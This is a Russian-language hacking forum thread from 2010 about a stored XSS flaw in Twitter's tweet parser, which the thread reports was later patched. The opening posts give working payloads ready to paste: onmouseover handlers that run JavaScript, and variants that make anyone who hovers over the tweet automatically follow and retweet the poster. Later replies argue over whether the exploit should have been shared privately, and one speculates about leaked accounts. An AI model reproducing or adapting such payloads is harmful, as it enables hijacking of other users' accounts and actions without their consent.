Старый 21.09.2010, 13:23   #1
mr.The
 
Аватар для mr.The
 
Регистрация: 05.07.2010
Сообщений: 73
Репутация: 16
Cool Активная xss в twitter!

Пример: http://twitter.com/mr_the/status/25105420721 (там только alert)

Началось всё отсюда, автор не известен(банальное раскрашивание через css) http://twitter.com/RainbowTwtr
Собственно причина - кривой парсер без должной фильтрации.

Достаточно отпостить твитт вида "http://twitter.com/mr_the#@"onmouseover="jAvascript:alert('Ha-ha! XSS!');"/" и будет много-много радости.

УПД: вроде как с 15:52 (по Киеву) уже нельзя постить злые твитты. Старые ещё ок работают.
УПД2: http://status.twitter.com/post/11614...ed-and-patched Пропатчили. Это было весело
__________________
Бложек mr.The. :rolleyes:
mr.The вне форума   Ответить с цитированием
Старый 21.09.2010, 15:13   #2
mr.The
 
Аватар для mr.The
 
Регистрация: 05.07.2010
Сообщений: 73
Репутация: 16
По умолчанию

Ещё парочка отличных команд.
Цитата:
http://t.co/@"onmouseover="document.getElementById('status').v alue='FOLLOW mr_The';$('.status-update-form').submit();"font-size:500pt;/
и
Цитата:
http://t.c/@"onmouseover="document.getElementById('status').v alue='RT mr_The';$('.status-update-form').submit();"font-size:500pt;/
автоматичесий фолловинг меня(mr_The) и ретвитт последнего твитта. Веселота. Как бы не забанили)
__________________
Бложек mr.The. :rolleyes:
mr.The вне форума   Ответить с цитированием
Старый 21.09.2010, 16:04   #3
haked
 
Аватар для haked
 
Регистрация: 15.08.2010
Сообщений: 16
Репутация: 2
По умолчанию

mr.The, ты автор находки?
haked вне форума   Ответить с цитированием
Старый 21.09.2010, 16:13   #4
mr.The
 
Аватар для mr.The
 
Регистрация: 05.07.2010
Сообщений: 73
Репутация: 16
По умолчанию

Нет, я просто активнее всех стал её форсить, достаточно посмотреть в мой твиттер.
Алсо, пост на хабре http://habrahabr.ru/blogs/infosecurity/104665/
__________________
Бложек mr.The. :rolleyes:
mr.The вне форума   Ответить с цитированием
Старый 21.09.2010, 17:29   #5
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

Цитата:
Пропатчили. Это было весело
и смысл было это выкладывать в паблик на пять минут. Лучше бы местным в приват кинул
Pashkela вне форума   Ответить с цитированием
Старый 21.09.2010, 17:40   #6
satana-fu
 
Аватар для satana-fu
 
Регистрация: 05.07.2010
Сообщений: 2
Репутация: 0
По умолчанию

Цитата:
Сообщение от Pashkela Посмотреть сообщение
и смысл было это выкладывать в паблик на пять минут. Лучше бы местным в приват кинул
нашел бы сам, не выложил бы (имеется ввиду ТС). А найденное чужим трудом и потом не жалко.
Жирный минус ТС.
satana-fu вне форума   Ответить с цитированием
Старый 21.09.2010, 17:58   #7
Dr.TRO
 
Аватар для Dr.TRO
 
Регистрация: 06.07.2010
Сообщений: 90
Репутация: 21
По умолчанию

satana-fu, дело сугобу личное как и например кардинг, у каждого свои взгляды.
__________________
http://fc01.deviantart.net/fs48/f/20...eyecixramd.png
http://img156.imageshack.us/img156/2...userbartd7.png
Цитата:
root@rdot.org ~ # perl -MAcme::BadExample
Dr.TRO вне форума   Ответить с цитированием
Старый 21.09.2010, 19:11   #8
mr.The
 
Аватар для mr.The
 
Регистрация: 05.07.2010
Сообщений: 73
Репутация: 16
По умолчанию

Цитата:
нашел бы сам, не выложил бы (имеется ввиду ТС). А найденное чужим трудом и потом не жалко.
Жирный минус ТС.
лол, учитывая, что это начали использовать для раскрашивания твиттов, и только потом как xss - я конечно спалил дикий превад да.
В твиторе и без меня было весело, я ничего кардинально нового не придумал, разве что заметил одним из первых.
__________________
Бложек mr.The. :rolleyes:
mr.The вне форума   Ответить с цитированием
Старый 21.09.2010, 19:13   #9
Feldmarschall
 
Аватар для Feldmarschall
 
Регистрация: 06.07.2010
Сообщений: 30
Репутация: 2
По умолчанию

в паблик не надо было вкладывать ИМХО
__________________
В тюрьмах России половина невиновных

Feldmarschall вне форума   Ответить с цитированием
Старый 21.09.2010, 20:48   #10
M@ZAX@KEP
 
Аватар для M@ZAX@KEP
 
Регистрация: 24.07.2010
Сообщений: 139
Репутация: 5
По умолчанию

Цитата:
в паблик не надо было вкладывать ИМХО
Я понял почему у тебя на аве слепой в чёрных очках XD (без обид) см. пост выше твоего. Это уже был никакой не приват.

ЗЫ чувствую, на днях должна в инете всплыть база ломаных акков через эту XSS с твиттера
M@ZAX@KEP вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot